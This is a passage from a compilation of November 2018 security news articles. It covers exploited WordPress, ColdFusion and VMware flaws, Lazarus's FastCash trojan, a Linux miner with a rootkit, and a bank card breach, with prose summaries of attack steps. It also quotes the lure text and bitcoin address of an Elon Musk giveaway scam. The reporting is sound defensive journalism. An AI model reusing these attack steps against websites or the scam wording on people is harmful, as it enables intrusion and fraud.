In 2017 "nearly one billion people were victims of cyberattacks, mainly WannaCry and NotPetya," Brad Smith, Microsoft's president and chief legal officer, told reporters in Paris on Sunday.
WannaCry is thought to have been deployed from North Korea, while many experts attribute NotPetya to Russia.
But security officials note that those two attacks appear to be based on code stolen from the US National Security Agency, which leads the country's cyber-defences.
So far internet security has been based largely on cooperation between individual companies and governments, with no overarching framework.
"It's a domain that is managed, but not governed," an adviser to Macron said, warning that a "free, open and secure" internet risked quickly becoming a thing of the past.
Google Introduces Security Transparency Report for Android
12.11.2018 securityweek Android
Google last week added a quarterly Android Ecosystem Security Transparency Report to its Transparency Report site.
The new report aims to provide users with additional insights into how often it detects devices with potentially harmful applications (PHAs) installed, based on routine, full-device scans performed by Google Play Protect.
A built-in protection on Android devices, Google Play Protect currently scans over 50 billion apps every day, both from inside and outside of Google Play, the Internet search giant says. The purpose of these scans is to find PHAs, warn users on their presence, and disable or remove them.
According to Google, the percentage of Android devices with PHAs on them was below the 1% mark in 2014 and has been steadily declining ever since. The trend continues throughout 2018 as well, the company says.
As part of the new transparency report, users will be provided with PHA rates in three areas: market segment (whether a PHA came from Google Play or outside of Google Play), Android version, and country.
“Google works hard to protect your Android device: no matter where your apps come from. Continuing the trend from previous years, Android devices that only download apps from Google Play are 9 times less likely to get a PHA than devices that download apps from other sources,” the company says.
Google reviews submitted apps before publishing them in Google Play, to confirm they comply with the storefront’s policies. A risk scorer is used to analyze apps and detect potentially harmful behavior and suspicious apps are flagged and referred to a security analyst for manual review.
Apps the users download from outside of Google Play are also scanned, and devices are protected from threats arriving in this manner as well.
The Android Ecosystem Security Transparency Report includes a market segment chart with the percentage of Android devices that have one or more PHAs installed over time. Information is provided on PHA rates for devices that either install exclusively from Google Play or from outside of Google Play as well.
“In 2017, on average 0.09% of devices that exclusively used Google Play had one or more PHAs installed. The first three quarters in 2018 averaged a lower PHA rate of 0.08%. […] In 2017, ~0.82% of devices that installed apps from outside of Google Play were affected by PHA; in the first three quarters of 2018, ~0.68% were affected,” Google explains.
Newer Android versions are less affected by PHAs, due to continued platform and API hardening, security updates, and app security and developer training. Newer Android versions, Google also claims, are more resilient to privilege escalation attacks that were previously abused by PHAs to gain persistence and protect themselves against removal attempts.
According to Google, PHA rates in the ten largest Android markets have remained steady, and the new transparency report includes a chart with PHA rates for the top 10 countries with the highest volume of Android devices.
“India saw the most significant decline in PHAs present on devices, with the average rate of infection dropping by 34 percent. Indonesia, Mexico, and Turkey also saw a decline in the likelihood of PHAs being present on devices in the region. South Korea saw the lowest number of devices containing PHA, with only 0.1%,” Google explains.
Reading the Android Ecosystem Security Transparency Report
12.11.2018 securityaffairs Android
According to Android Ecosystem Security Transparency Report the number of potentially harmful applications has fallen from 0.66% in Lollipop to 0.06% in Pie
Google published the first Android Ecosystem Security Transparency Report that revealed that the number of potentially harmful applications (PHAs) discovered on Android 9 Pie devices has been reduced by half compared to the previous versions.
According to the Android Ecosystem Security Transparency Report, the number of potentially harmful applications (PHAs) has fallen from 0.66 percent in Lollipop to 0.06 percent in Pie.
The number obtained from the analysis of malware detected by Google Play Protect scans that was launched in May 2017 to protect the devices running its Android OS.
The system is integrated into the Google Play Store app, this means that its usage is transparent to the end user that doesn’t need to install or enable it on his device. It analyzes malicious applications distributed through the Play Store and third-party app stores.
“Google Play Protect continuously works to keep your device, data and apps safe. It actively scans your device and is constantly improving to make sure you have the latest in mobile security. Your device is automatically scanned around the clock, so you can rest easy.” reads the description published by Google.
Google Play Protect implements the following features:
Google highlighted the importance of installing applications from its official store, only 0.09 percent of devices that used Google Play Store were infected in 2017, that corresponds for 1.8 million phones.
Measures implemented by Google to remotely control the presence of malicious code are the root cause of the significant drop in the number of malicious applications running on Android devices.
The analysis of the top 10 countries with the highest volume of Android devices revealed that Indonesia, India, Brazil, and the US have the highest percentage of devices with at least one potentially harmful application installed.
“India continues to be affected by trojans, such as Ghost Push and Hummingbad, which we described in the 2016 Year in Review. The spike in Q1 2017 was caused by a legitimate video player from outside of Google Play that downloaded and installed PHAs on user devices. We believe that the developer used an advertising network that pushed PHAs and did not know about this behavior.” states the report.
“The situation looks different in the USA. Many of the PHA installations come from popular rooting tools and an app that fakes GPS coordinates to cheat at Pokémon Go. We don’t remove these apps, but still warn users that these apps may degrade device security. The PHA profile of Brazil looks different from India and the USA. Major contributors to Brazil’s PHA rate were two pre-installed apps that send SMS to premium-rate SMS numbers.” continues the report.”
Further details are included in the Android Ecosystem Security Transparency report.
A critical flaw in GDPR compliance plugin for WordPress exploited in the wild
12.11.2018 securityaffairs Vulnerebility
A critical security vulnerability affects a GDPR compliance plugin for WordPress has been already exploited in the wild to take control of vulnerable websites.
Users warn of cyber attacks exploiting a critical security vulnerability in the WordPress GDPR Compliance plugin for WordPress to take over of websites using it.
The WordPress GDPR Compliance plugin was used by more than 100,000 websites to be compliant with the EU’s General Data Protection Regulation (GDPR). WP GDPR Compliance currently supports Contact Form 7 (>= 4.6), Gravity Forms (>= 1.9), WooCommerce (>= 2.5.0) and WordPress Comments. Additional plugin support will follow soon.
Researchers from the Wordfence reported that WordPress GDPR Compliance plugin is affected by vulnerabilities can be exploited by unauthenticated attackers to add new admin accounts.
“The reported vulnerabilities allow unauthenticated attackers to achieve privilege escalation, allowing them to further infect vulnerable sites. Any sites making use of this plugin should make it an immediate priority to update to the latest version, or deactivate and remove it if updates are not possible.” reads the analysis published by Wordfence.
“We’ve already begun seeing cases of live sites infected through this attack vector. In these cases, the ability to update arbitrary options values is being used to install new administrator accounts onto the impacted sites.”
Researchers from Wordfence have observed two types of attacks. In one attack scenario attackers exploit the vulnerabilities to modify the “users_can_register” option and allow new users to be registered. The attackers also change the role of new users to “administrator,” to gain full privileges on the websites.
The attackers use the admin account to upload a PHP webshell.
“By leveraging this flaw to set the users_can_register option to 1, and changing the default_role of new users to “administrator”, attackers can simply fill out the form at /wp-login.php?action=register and immediately access a privileged account. From this point, they can change these options back to normal and install a malicious plugin or theme containing a web shell or other malware to further infect the victim site.” continues the analysis.
In a second attack scenario observed by Wordfence experts, attackers used a more complex technique. Attackers installed backdoors by injecting malicious actions into a website’s WP-Cron schedule in order to establish a persistent backdoor.
“In several of the cases we’ve triaged since the disclosure of this vulnerability, we’ve seen malicious administrator accounts present with the variations of the username t2trollherten. This intrusion vector has also been associated with uploaded webshells named wp-cache.php. While these are common IOCs (Indicators of Compromise), these exploits are of course subject to change as attacks grow in sophistication.” states the analysis.
Compromised websites could be used by attackers for various illegal activities, including phishing, and spamming, or to resell the access to them on the cybercrime underground.
The development team behind GDPR Compliance plugin deactivated the plugin on its official store and reinstated after the release of the version 1.4.3 on November 7 that addressed the flaws.
France seeks Global Talks on Cyberspace security and a “code of good conduct”
12.11.2018 securityaffairs BigBrothers
The French government announced a “Paris Call” for global talks about cyberspace security aimed at laying out a shared framework of rules.
The French government is promoting a series of Global Talks on cyberspace security, it urges for a “code of good conduct” for states in the cyberspace.
Events such as the interference in the 2016 Presidential election or massive attacks like WannaCry and NotPetya increase the sense of urgency among states.
The risk of escalation and retaliation in cyberspace, the increasing number of cyber attacks and cyber threats even more sophisticated could have a destabilizing effect on international peace and security. The risk of conflict between states caused so cyber incidents encourages all States to engage in law-abiding, norm-respecting and confidence-building behavior in their use of ICT.
I’m one of the authors of the G7 DECLARATION ON RESPONSIBLE STATES BEHAVIOR IN CYBERSPACE that were signed in 2017 during the Italy G7 meeting.
I had the honor to be a member of the group that worked on the proposal for voluntary, non-binding norms of State behavior during peacetime. We presented 12 points aimed to propose stability and security in the cyberspace. The declaration invites all the States to collaborate with the intent to reduce risks to international peace, security, and stability.
The decision of the French government aims to relaunch the discussion of the adoption of a framework for norms of state behavior in the cyberspace, a sort of prosecution of the work started last year during the G7 meeting.
“Officials said the text, to be presented by President Emmanuel Macron as he opens UNESCO’s Internet Governance Forum in Paris on Monday, has been signed by most European countries.” reads the press release published by AFP.
During the G7 meeting emerged the need to open the discussion to other states, including China, Russia, and India.
Now China, Russia, and the United States have not yet joined to the initiative, even if major firms and organizations like Microsoft and the NGO Internet Society believe that a supplementary effort is essential to define the framework.
“The identity and number of signatories are to be released later Monday, following a lunch hosted at the Elysee Palace by Macron for dozens of technology executives and officials.” continues the AFP.
“To respect people’s rights and protect them online as they do in the physical world, states must work together, but also collaborate with private-sector partners, the world of research and civil society,”
Security in the cyberspace could be improved only through the active participation of any government, for this reason, it is urgent the definition and the approval in a mandatory way of a set of shared roles. The work we made during the G7 was an excellent starting point for further discussions on a global scale.
“It’s a domain that is managed, but not governed,” an adviser to Macron said, warning that a “free, open and secure” internet risked quickly becoming a thing of the past.
Let me close with a polemical note, in Italy the G7 group that has worked to the declaration has been dismantled and no action has been taken anymore.
Hackers Exploit Flaw in GDPR Compliance Plugin for WordPress
11.11.2018 securityweek Vulnerebility
A critical security flaw affecting a GDPR compliance plugin for WordPress has been exploited in the wild to take control of vulnerable websites, users have been warned.
The WordPress GDPR Compliance plugin, which has over 100,000 active installations, is designed to help the administrators of websites and online shops become compliant with the EU’s General Data Protection Regulation (GDPR). It supports plugins such as Contact Form, Gravity Forms, WordPress Comments, and WooCommerce.
Malicious hackers discovered recently that the plugin is affected by some flaws that can be exploited to hijack vulnerable websites.
According to researchers in Defiant’s Wordfence team, the vulnerabilities can be exploited by unauthenticated attackers to obtain privileged access to targeted websites by adding new admin accounts.
Wordfence has seen two types of attacks. In the most common attack, hackers exploit the vulnerabilities to modify settings and allow new users to register. They also change the role of new users to “administrator,” which makes it easy to gain admin access to the site.
The exploit, which has been automated, also ensures that the changes are reversed once an admin account has been obtained. Wordfence researchers believe this is most likely done in an effort to lock out other potential attackers and avoid raising suspicion.
The attackers log in using the newly created account and upload a PHP webshell that allows them to do whatever they wish on the compromised website.
Wordfence has also seen backdoors installed by injecting malicious actions into a website’s WP-Cron schedule. While this is a more complex technique, it allows the attackers to deploy a persistent backdoor that can regenerate in case it’s removed.
The attackers could abuse hijacked websites for various purposes, including spamming, phishing, and other direct or indirect money-making schemes. However, Wordfence says it has yet to see any final payloads.
“This behavior can mean a number of different things,” Wordfence researchers said.
“It’s possible that these attackers are stockpiling infected hosts to be packaged and sold wholesale to another actor who has their own intentions. There’s also the chance that these attackers do have their own goals in mind, but haven’t launched that phase of the attack yet.”
Shortly after the news broke that the GDPR Compliance flaws have been exploited in the wild, WordPress notified the developer and deactivated the plugin on its official store. The application was quickly reinstated after its creators released version 1.4.3 on November 7, which should resolve the vulnerabilities.
The plugin’s developers have advised users to update their installations, but also check their databases for any unauthorized changes, including new user accounts with admin privileges.
Crooks are exploiting the popularity of Elon Musk and a series of hacked verified Twitter accounts to implement a new fraud scheme.
Crooks are exploiting the popularity of Elon Musk and a series of hacked verified Twitter accounts (i.e. UK retailer Matalan, US publisher Pantheon Books, and official government Twitter accounts such as the Ministry of Transportation of Colombia and the National Disaster Management Authority of India.) in a simple as effective scam scheme.
₿iht Coign BSc (Hons)
Come on @twitter @TwitterSupport ??
This is a blatant scam which is being promoted by Twitter and by other potencially hacked or impersonating VERIFIED accounts.
tweet: https://web.archive.org/save/https://twitter.com/PantheonBooks/status/1059433629795926024 …
cc: @elonmusk @Cointelegraph @coindesk @ADCuthbertson @verified @BillyBambrough
3:04 PM - Nov 5, 2018
See ₿iht Coign BSc (Hons)'s other Tweets
Twitter Ads info and privacy
The accounts were hacked to impersonate Elon Musk, once hijacked, scammers changed the accounts’ names and profile pictures to those of the popular entrepreneur and started using them to share tweet calling for people to send him cryptocurrency.
The accounts were informing Twitter users of a new alleged Musk’s initiative of creating the biggest crypto-giveaway of 10,000 bitcoins.
“I’m giving 10 000 Bitcoin (BTC) to all community!” I left the post of director of Tesla, thank you all for your support,” states the hacked account of Pantheon Books.
With this scheme crooks already earned over 28 bitcoins or approximately $180,000 USD, in just a single day, the scammers received 392 transactions to the bitcoin address 1KAGE12gtYVfizicQSDQmnPHYfA29bu8Da.
In order to improve the visibility of the Tweets, scammers promoted a series of giveaway sites through Twitter advertising (i.e. musk[.]plus, musk[.]fund, musk[.]plus, and spacex[.]plus), which instruct visitors to send .1 or 3 BTC to a specific address in order to get back 1-30 times in bitcoins.
“To verify your address, send from 0.1 to 3 BTC to the address below and get from 1 to 30 BTC back!
BONUS: Addresses with 0.30 BTC or more sent, gets additional +200% back!
You can send BTC to the following address.
Waiting for your payment…
As soon as we receive your transaction, the outgoing transaction will be processed to your address.”
Dozens of people sent the minimum 0.1 bitcoins, but some naive users sent as much as from 0.5, up to 0.9995 bitcoins (roughly $6,000).
Twitter does not comment on individual accounts, but shared the following statement:
“Impersonating another individual to deceive users is a clear violation of the Twitter Rules. Twitter has also substantially improved how we tackle cryptocurrency scams on the platform. In recent weeks, user impressions have fallen by a multiple of 10 in recent weeks as we continue to invest in more proactive tools to detect spammy and malicious activity. This is a significant improvement on previous action rates.”
Linux Cryptocurrency miner leverages rootkit to avoid detection
12.11.2018 securityaffairs Cryptocurrency
Researchers from Trend Micro spotted a new cryptocurrency miner that leverages a rootkit component to hide its presence on the infected systems.
Cryptocurrency malware continues to be a privileged choice for crooks and the number of victims is rapidly growing.
Cryptocurrency miners are easy to detect due to the saturation of resources on the affected systems, but experts from Trend Micro spotted a new miner that leverages a rootkit component to hide its presence.
Even if the malware slows down infected systems abusing of their resources, the administrators will not be able to detect what process is causing it.
“We recently encountered a cryptocurrency-mining malware (detected by Trend Micro as Coinminer.Linux.KORKERDS.AB) affecting Linux systems,” reads the report published by TrendMicro.
“It is notable for being bundled with a rootkit component (Rootkit.Linux.KORKERDS.AA) that hides the malicious process’ presence from monitoring tools. This makes it difficult to detect, as infected systems will only indicate performance issues. The malware is also capable of updating and upgrading itself and its configuration file.”
The experts speculate that the infection vector could be an unofficial or compromised plugin such as a media-streaming software.
Once installed the initial executable (Trojan.Linux.DLOADER.THAOOAAK) will download a file from Pastebin that is a shell script. The file is saved as /bin/httpdns and a scheduled task is created to run /bin/httpdns every hour. The shell script is executed. /bin/httpdns contains a shell script that connects and downloads another base64-encoded text file.
The process will allow to download and execute a series of shell scripts that ultimately install the miner and then a rootkit to hide its presence.
Experts pointed out that when the rootkit is not installed, administrators can easily detect the malicious process utilizing 100% of the CPU.
The following images show how the miner process is hidden by the rootkit.
Once the rootkit is installed, though, the process causing the high CPU is not visible even though the total system utilization is still shown as 100%.
“The rootkit component of the cryptocurrency-mining malware is a slightly modified/repurposed version of a publicly available code. Upon installation, all processes named “kworkerds” will be invisible to process monitoring tools.” concludes the report.
“While the rootkit fails to hide the high CPU usage and the connections made by the cryptocurrency miner, it improved its stealth by just editing a few lines of code and repurposing existing code or tools. And with the malware’s capability to update itself, we expect its operators to add more functions to make their malware more profitable. “
CVE-2018-15961: Adobe ColdFusion Flaw exploited in attacks in the wild
12.11.2018 securityaffairs Vulnerebility
Experts at Volexity discovered that a recently patched remote code execution flaw
(CVE-2018-15961) affecting the Adobe ColdFusion has been exploited in the wild.
Security experts from Volexity reported that attackers in the wild are exploiting a recently patched remote code execution vulnerability affecting the Adobe ColdFusion.
The flaw, tracked as CVE-2018-15961, is an unrestricted file upload vulnerability, successful exploitation could lead to arbitrary code execution.
The vulnerability was reported by Pete Freitag of Foundeo and addressed in September by Adobe (security bulletin APSB18-33).
Researchers from Volexity have uncovered a Chinese-based APT group exploiting the vulnerability to upload the China Chopper webshell to a vulnerable server.
The analysis of the hacked server revealed that it had all ColdFusion updates installed, except for the CVE-2018-15961 fix. Attackers exploited the flaw, a couple of weeks after Adobe released the security patches.
“In the attack detected by Volexity, a suspected Chinese APT group was able to compromise a vulnerable ColdFusion server by directly uploading a China Chopper webshell.” reads the advisory published by Volexity.
“The target server was missing a single update from Adobe that had been released just two weeks earlier.”
According to the experts, the flaw was introduced when the Adobe replaced the FCKeditor WYSIWYG editor with the CKEditor.
In order to exploit the flaw, an attacker have to send a specially crafted HTTP POST request to the upload.cfm file which is not restricted and does not require any authentication.
Experts noticed that the new editor CKEditor prevents users from uploading potentially dangerous files, such as .exe and .php, it still allows to upload .jsp files.
“Volexity observed the APT group exploit CVE-2018-15961 in order to upload the JSP version of China Chopper and execute commands on the impacted web server before being cut off. ” continues the analysis.
“The APT group observed by Volexity identified that Adobe did not include the .jsp file extension in the default configuration, which was problematic because ColdFusion allows .jsp files to be actively executed. The attackers also identified a directory modification issue through the ‘path‘ form variable that allowed them to change the directory to where uploaded files would be placed. This means that even if the .jsp file extension had been on the block list, the attackers could have placed another script or executable file somewhere on the system in an attempt to compromise it (likely during startup following reboot). The .jsp file extension was added to the default list of disallowed files (shown above) during the update from Adobe; the path modification issue was also addressed.”
After identifying the attacks carried out by the Chinese APT, Volexity examined several ColdFusion servers exposed online many of them appear to have been compromised.
The servers belong to state government, educational, healthcare, and humanitarian aid organizations and each of them had been defaced or presented attempts to upload a webshell.
It is not clear if the attackers exploited the CVE-2018-15961 to hack them, however, based on the placement of the files on the affected servers, Volexity believes that a non-APT actor may have exploited the flaw prior to September 11, 2018, likely in early June.
Experts noticed that some of the defaced websites included messages attributed to AnoaGhost, an Indonesian hacktivist group linked to a pro-ISIS hacktivist group.
Let’s close with a curiosity, the CVE-2018-15961 flaw was initially underestimated, Adobe assigned it a priority rating of “2” due to the low likelihood of exploitation, but in late September changed the priority to “1”
Symantec shared details of North Korean Lazarus’s FastCash Trojan used to hack banks
11.11.2018 securityaffairs APT
North Korea-linked Lazarus Group has been using FastCash Trojan to compromise AIX servers to empty tens of millions of dollars from ATMs.
Security experts from Symantec have discovered a malware, tracked as FastCash Trojan, that was used by the Lazarus APT Group, in a string of attacks against ATMs.
The ATP group has been using this malware at least since 2016 to siphon millions of dollars from ATMs of small and midsize banks in Asia and Africa.
The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.
This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems.
The group is considered responsible for the massive WannaCry ransomware attack, a string of SWIFTattacks in 2016, and the Sony Pictures hack.
Earlies October, a joint technical alert from the DHS, the FBI, and the Treasury warned about a new ATM cash-out scheme, dubbed “FASTCash,” used by Hidden Cobra APT.
Following the above alert, Symantec uncovered the malware used in the FastCash scheme that was designed to intercept and approve fraudulent ATM cash withdrawal requests and send fake approval responses.
“Following US-CERT’s report, Symantec’s research uncovered the key component used in the group’s recent wave of financial attacks. The operation, known as “FASTCash”, has enabled Lazarus to fraudulently empty ATMs of cash. To make the fraudulent withdrawals, Lazarus first breaches targeted banks’ networks and compromises the switch application servers handling ATM transactions.” reads the analysis published by Symantec.
“Once these servers are compromised, previously unknown malware (Trojan.Fastcash) is deployed. This malware in turn intercepts fraudulent Lazarus cash withdrawal requests and sends fake approval responses, allowing the attackers to steal cash from ATMs.”
The malicious code was specifically designed to be injected into a legitimate process on application servers running the IBM’s AIX operating system. Symantec discovered that all the switch application servers targeted by the Lazarus APT Group were running unsupported versions of the AIX OS.
The hackers inject a malicious Advanced Interactive eXecutive (AIX) executable, tracked as Trojan.Fastcash, into a network handling ATM transactions. The malware is able to forgefraudulent ISO 8583 messages, where the ISO 8583 is the standard for financial transaction messaging.
Trojan.Fastcash has two primary functions:
It monitors incoming messages and intercepts attacker-generated fraudulent transaction requests to prevent them from reaching the switch application that processes transactions.
It contains logic that generates one of three fraudulent responses to fraudulent transaction requests.
Trojan.Fastcash will read all incoming network traffic, scanning for incoming ISO 8583 request messages, and when a Primary Account Number (PAN) used by the attackers is detected the malware will attempt to modify these messages.
The messages are modified depending on each victim organization, the malicious code will generate a fake response message approving fraudulent withdrawal requests. In this way, the hackers get the attempts to withdraw money via an ATM approved.
Symantec has discovered multiple versions of the FastCash Trojan that implement a different response logic tailored for a specific transaction processing network.
Further details, including IoCs, are reported in the analysis published by Symantec.
Nginx server security flaws expose more than a million of servers to DoS attacks
11.11.2018 securityaffairs Vulnerebility
Nginx developers released security updates to address several denial-of-service (DoS) vulnerabilities affecting the nginx web server.
nginx is an HTTP and reverse proxy server, a mail proxy server, and a generic TCP/UDP proxy server, it is used by 25.28% busiest sites in October 2018.
Nginx development team released versions 1.15.6 and 1.14.1 to address two HTTP/2 implementation vulnerabilities that can cause a DoS condition in Nginx versions 1.9.5 through 1.15.5.
Two security flaws affecting the nginx HTTP/2 implementation, tracked as CVE-2018-16843 and CVE-2018-16844, might respectively cause excessive memory consumption and CPU usage,
The CVE-2018-16844 flaw was discovered by Gal Goldshtein from F5 Networks.
“Two security issues were identified in nginx HTTP/2 implementation, which might cause excessive memory consumption (CVE-2018-16843) and CPU usage (CVE-2018-16844).” wrote nginx core developer Maxim Dounin.
“The issues affect nginx compiled with the ngx_http_v2_module (not compiled by default) if the “http2” option of the “listen” directive is used in a configuration file.”
At the time of writing, querying the Shodan search engine it is possible to find more than 1 million servers running unpatched nginx versions.
nginx team also fixed a flaw affecting the ngx_http_mp4_module module (CVE-2018-16845) that could be exploited by an attacker to cause the worker process to crash or leak memory by getting the module to process a specially crafted MP4 file.
“nginx before versions 1.15.6, 1.14.1 has a vulnerability in the ngx_http_mp4_module, which might allow an attacker to cause infinite loop in a worker process, cause a worker process crash, or might result in worker process memory disclosure by using a specially crafted mp4 file.” reads the security advisory published by NVD.
“The issue only affects nginx if it is built with the ngx_http_mp4_module (the module is not built by default) and the .mp4. directive is used in the configuration file. Further, the attack is only possible if an attacker is able to trigger processing of a specially crafted mp4 file with the ngx_http_mp4_module.
The CVE-2018-16845 flaw affects nginx 1.1.3 and later and 1.0.7 and later, nginx team fixed it with the release of versions 1.15.6 and 1.14.1.
VPN vs. proxy: which is better to stay anonymous online?
11.11.2018 securityaffairs Safety
Most people prefer using proxies over VPN services because they are easy to use and mostly available for free, but can it be relied on for anonymity?
Now and then, we get to hear news about data breaches and cyber attacks. As such, it does not come as a surprise that people are becoming more and more concerned about their privacy on the Internet – and remaining anonymous is one of the best ways to protect it.
However, the question here is: which tool should you use to enhance your online anonymity? Most people prefer using proxies over VPNs because they are easy to use and mostly available for free, but can it be relied on for anonymity?
VPN vs. Proxy
Well, let’s take a closer look at both and find out:
What is a Proxy?
A proxy acts as a middleman between you and the Internet. All your requests are retrieved by a remote server or computer and then sent to your device. As a result, websites will only be able to see the proxy’s IP, and not your real IP address. This makes proxies ideal for small tasks like accessing blocked websites in your region.
However, since they do not encrypt your traffic and communications, your personal information can be easily accessed by an intruder. Typically, a proxy does not strip away identifying data from your transmissions beyond the usual IP swap, and there are no added privacy or security considerations built in either.
Therefore, anybody can snoop on your internet traffic, which means your far from anonymous when you use a proxy. Moreover, it needs to be configured separately for each application and this takes a lot of time and effort, especially if you are not much of a techie. You can only connect a single application with a proxy, so diverting your entire web usage is out of the question.
To Sum Up:
A proxy works fine when it comes to access unavailable websites, but it does not have the features to keep you safe and anonymous on the Internet. In addition, setting it up for each application that you use can be a headache.
What is a VPN?
A virtual private network, aka VPN, makes it appear as if your internet traffic is originating from a different IP address and different location, rather than your original one. Although the idea of both proxy and VPN is similar, this is the only point of similarity between the two.
VPNs get deployed on the complete network connection of the device it is configured on, unlike a proxy server which primarily works as a middleman server for a single application (like your internet browser or BitTorrent application). Also, all your data is passed through a secure encrypted tunnel, making it unreadable to the outside world.
This makes a VPN association the best answer for any situation where privacy or security protection is the primary concern. With a VPN, third-parties cannot see what you are up to online, and neither can they place themselves in between your device and the VPN server.
Even if you’re currently on a business trip in the Atlantic, you can still benefit from using a VPN. With it enabled, you can use public Wi-Fi securely at coffee shops and other public places. Not only this, but you can also access your home or office network remotely in the safest way possible.
While there are hundreds of VPNs that claim to be the best, you must do your due research to find the best one for your needs. If you’re genuinely concerned about privacy and anonymity, the best VPNs in the market will not log your browsing activity, and come equipped with a plethora of premium features like kill switch, split tunneling, DNS leak protection, etc.
To Sum Up:
A VPN not only hides your IP address with that of the remote server you connect to, but also secures the internet traffic to and from your device for complete privacy and security. Additionally, setting up a VPN is very easy as many providers offer easy-to-use apps and software.
For anyone with long-term concerns about confidentiality, security and information protection, investment in a good VPN is unquestionably the best choice to be “anonymous.” However, it is important to mention that you cannot expect the same benefits when using a free VPN – you should always opt for reliable paid options!
"Inception Attackers" Combine Old Exploit and New Backdoor
11.11.2018 securityweek Vulnerebility
A malicious group known as the “Inception” attackers has been using a year-old Office exploit and a new backdoor in recent attacks, Palo Alto Networks security researchers warn.
Active since at least 2014, the group has used custom malware and against targets spanning various industries worldwide, with a special interest in Russia.
In October 2018, the threat actor was observed hitting various European targets in attacks employing an exploit for a vulnerability (CVE-2017-11882) that Microsoft patched in November 2017. Furthermore, the hackers were using a new PowerShell backdoor dubbed POWERSHOWER, which revealed high attention to detail in terms of cleaning up after infection.
As part of the observed attacks, the actor has been using a single malicious document and a remote template to deliver their malicious payload. The use of a template was associated with the group before, but previous attacks revealed the use of two documents, including an initial spear-phish for reconnaissance.
Microsoft Word allows for the loading of templates that are hosted externally, either on a file share, or on the Internet. The template is loaded as soon as the document is opened and hackers have been known to abuse the feature in malicious ways.
The Inception attackers have been using remote templates in their campaigns for the past 4 years, leveraging the various benefits the method provides, such as the fact that the initial document does not contain an explicitly malicious object.
The attack technique also provides the attacker with the option to deploy malicious content to the victim based on the initial data received from the target. This also keeps the malicious code away from researchers attempting to analyze the attack, if the hosting server is down.
The malicious document used in the recent attacks displays decoy content and attempts to fetch the remote content over HTTP. In one attack, the malicious template contained exploits for CVE-2012-1856 and CVE-2017-11882.
The payload in these attacks is POWERSHOWER, a simple PowerShell backdoor that acts as an initial reconnaissance foothold and also supports the download and execution of a secondary payload that includes a more complete set of features.
This also ensures that the more sophisticated and complex malware that the attackers might have in their portfolio remains hidden from investigators. POWERSHOWER can also clean up a significant amount of forensic evidence from the dropper process (including files and registry keys)
VMware Patches VM Escape Flaw Disclosed at Chinese Hacking Contest
11.11.2018 securityweek Vulnerebility
VMware informed customers on Friday that patches are available for a critical virtual machine (VM) escape vulnerability disclosed recently by a researcher at the GeekPwn2018 hacking competition.
Organized by the security team of Chinese company Keen Cloud Tech, GeekPwn is a hacking competition that in the past years has led to the discovery of many important vulnerabilities. The competition has been held in China since 2014, but starting with 2017 there has also been an event in the United States.
GeekPwn2018 took place in Shanghai, China, on October 24-25, and its initial prize pool was $800,000.
One of the most interesting entries in the contest came from a researcher at China-based security firm Chaitin Tech, who discovered a guest-to-host escape vulnerability affecting several VMware products. He also identified a less severe information disclosure bug.
Shortly after the VM escape exploit was demonstrated, Chaitin Tech wrote on Twitter that it was the first time anybody managed to escape VMware ESXi and get a root shell on the host system. The company posted a short video showing the exploit in action.
VMware on Tuesday informed customers that it had been provided the details of the vulnerabilities and on Friday it published an advisory describing the flaws and available patches.
According to the virtualization giant, the vulnerabilities, tracked as CVE-2018-6981 and CVE-2018-6982, are caused by an uninitialized stack memory usage bug in the vmxnet3 virtual network adapter.
CVE-2018-6981 affects ESXi, Fusion and Workstation products, and it can allow a guest to execute arbitrary code on the host, while CVE-2018-6982, which only impacts ESXi, can result in an information leak from the host to the guest. VMware pointed out that the vulnerabilities are only present if the vmxnet3 adapter is enabled – other adapters are not impacted.
VMware has released patches and updates for both vulnerabilities.
It’s worth noting that Chaitin Tech researchers have also earned significant prizes at ZDI’s Pwn2Own hacking competition in the past years. It’s unclear how much they earned for the VMware product vulnerabilities disclosed at GeekPwn.
Data from ‘almost all’ Pakistani banks stolen, Pakistani debit card details surface on the dark web
11.11.2018 securityaffairs CyberCrime
According to the head of the Federal Investigation Agency’s (FIA) cybercrime wing.almost all Pakistani banks were affected by a recent security breach.
Almost all Pakistani banks were affected by a recent security breach, the shocking news was confirmed by the head of the Federal Investigation Agency’s (FIA) cybercrime wing.
“According to a recent report we have received, data from almost all Pakistani banks has been reportedly hacked,” FIA Cybercrimes Director retired Capt Mohammad Shoaib told Geo News on Tuesday.
The comment released by the Capt Mohammad Shoaib follows the discovery made by cyber security firm Group-IB of a fresh dump of Pakistani credit and debit cards on dark web forums.
The agency is currently investigating more than 100 cases in connection with the security breach.
“More than 100 cases [of cyber-attack] have been registered with the FIA and are under investigation. We have made several arrests in the case, including that of an international gang [last month],” Capt Shoaib said.
The huge trove of data surfaced on the Dark Web includes 20,000 Pakistani debit card details surface on the dark web. Data belongs to customers of “most of the banks” operating in the country.
In an interview with DawnNewsTV, Shoaib explained that hackers based outside Pakistan have compromised the infrastructure of several Pakistani banks.
“The hackers have stolen large amounts of money from people’s accounts,” he added.
“The recent attack on banks has made it quite clear that there is a need for improvement in the security system of our banks,”
FIA notified his findings to all banks in the country called for a meeting with their representatives with the intent to respond to the incident, limit the damages and improve the overall security of Pakistani banks.
“Banks are the custodians of the money people have stored in them,” Shoaib said. “They are also responsible if their security features are so weak that they result in pilferage.”
At the time it is not clear when the security breach took place and how the attackers gained access to the systems at the Pakistani banks.
“An element of banking fraud which is a cause of concern is that banks hide the theft [that involves them]… and the clients report [the theft] to the banks and not to us, resulting in a loss of people’s money,” he told DawnNewsTV.
“We are trying to play a proactive role in preventing bank pilferage,”
The Pakistani banks are facing a severe emergency, last week a cyber attack on Bank Islami allowed attackers to stole at least Rs2.6 million from its accounts.
By the end of last week, some Pakistani banks had suspended usage of their debit cards outside the country and blocked all international transactions on their cards.
A large Pakistani bank informed its clients that online mobile banking services would be temporarily suspended starting from November 3.
Pakistan Computer Emergency Response Team (PakCERT) released a report that details the timeline and scale of data leaks. Experts at PakCERT believe that the data was obtained through card skimming.
According to the report, the first dump was offered for sale on the site JokerStash, experts found the “PAKISTANWORLD-EU-MIX-01,” containing over 11,000 records, more than 8,000 records were related to at least nine Pakistani banks.
These cards were offered for sale in the cybercrime underground for $100 up to $160.
Vulnerabilities discovered in several medical devices made by the diagnostics division of Swiss-based healthcare company Roche can put patients at risk, a cybersecurity firm has warned.
